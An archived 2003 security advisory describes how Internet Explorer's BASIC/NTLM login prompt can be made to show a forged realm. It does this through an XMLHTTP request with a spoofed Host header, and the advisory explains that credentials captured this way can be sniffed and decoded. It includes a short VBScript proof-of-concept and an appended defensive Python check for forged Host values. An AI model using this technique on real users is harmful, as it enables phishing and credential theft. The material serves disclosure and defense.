=================================================
Domain Name Forging On Authentication Prompt
-------------------------------------------------
Tested under
 * Win2k Server, fully patched, with IE 6.0
 * WinXP, fully patched, with IE 6.0
=================================================

* Background *

When browsing to a folder/file that is protected by BASIC or NTLM
authentication, a window is displayed to the user prompting for user
credentials.

+------------------------------------------+
| Please type your user name and password  |
| Site:     [IP/Host]                      |
| Realm:    [Domain  ]                     |
| Username: [        ]                     |
| Password: [        ]                     |
|           [OK]  [CANCEL]                 |
+------------------------------------------+

* Details *

It is possible to use the Msxml2.XMLHTTP object to create a login box and
set the realm to an arbitrary value. Using the object to make a request to
a URI that requires authentication, and setting the HOST header to a domain
of our choosing, the login prompt will be displayed using the HOST header
value as the realm. Although the SITE displayed will be the IP of the URI
(xxx.xxx.x.xx), unwary users may trust the realm value and enter their
login credentials.

By running a sniffer on the machine hosting the protected folder, it is
possible to sniff the BASIC authorization string, which in turn can be
base64 decoded to reveal the plaintext username:password pair.

This could be made more effective by using XSS to have the script appear
to be running from a valid domain. The sample script below should be
enough to demonstrate.

Note: To bypass IE domain restrictions, the IP of the protected folder
needs to be the same as the site hosting the script.
[Code Sample]

<script language="vbscript">
function sendinfo()
    Dim myhttp
    ' Create the XMLHTTP object used to issue the request
    Set myhttp = CreateObject("Msxml2.XMLHTTP")
    ' Synchronous GET to a resource on the protected site that requires authentication
    myhttp.open "GET", "http://xxx.xxx.x.xx/_vti_bin/_vti_adm/admin.dll", False
    ' Forged Host header; IE displays this value as the realm in the login prompt
    myhttp.setRequestHeader "Host", "secure.foo.bar"
    myhttp.send
    Set myhttp = Nothing
end function
</script>
<script>sendinfo()</script>

[End Code Sample]

* Solution *

This issue is probably by design, and as such the problem is with the end
user verifying the site that they are entering credentials for.

Brett Moore
Network Intrusion Specialist
security-assessment.com
+64-9-300-6494
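On the server side, the trick described above leaves a clear signature: a request carrying BASIC credentials whose Host header is not one of the names the server actually answers for. The check below is an added example (not part of the advisory or of any product) that parses a raw HTTP request, compares Host against an assumed allowlist, and extracts only the username from the Authorization header for alerting; the host names, the request and the credential are all constructed sample data.

```python
import base64
from typing import Optional

# Names this server legitimately serves under (assumed configuration).
ALLOWED_HOSTS = {"192.0.2.10", "intranet.example.com"}


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.x request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def basic_user(auth_header: Optional[str]) -> Optional[str]:
    """Return the username from a 'Basic' Authorization header, or None if absent/malformed."""
    if not auth_header or not auth_header.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth_header[6:].strip(), validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return None
    # RFC 7617: user-id may not contain ':', so split on the first one only.
    return decoded.split(":", 1)[0]


def check_request(raw: str) -> dict:
    """Flag BASIC credentials submitted under a Host value the server does not own."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").split(":", 1)[0].lower()
    user = basic_user(req["headers"].get("authorization"))
    forged = host not in ALLOWED_HOSTS
    return {"host": host, "user": user, "forged_host": forged,
            "alert": forged and user is not None}


# Constructed sample: the forged Host value from the advisory plus a Basic credential
# for the constructed user "alice".
SAMPLE = ("GET /_vti_bin/_vti_adm/admin.dll HTTP/1.1\r\n"
          "Host: secure.foo.bar\r\n"
          "Authorization: Basic YWxpY2U6cGFzc3dvcmQxMjM=\r\n"
          "\r\n")

if __name__ == "__main__":
    print(check_request(SAMPLE))
```

The same allowlist logic is what a web server's virtual-host configuration enforces when it refuses to serve requests for unknown Host names, which removes the attacker's control over the value the prompt displays.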
This archive was generated by hypermail 2b30 : Fri May 09 2003 - 09:27:12 PDT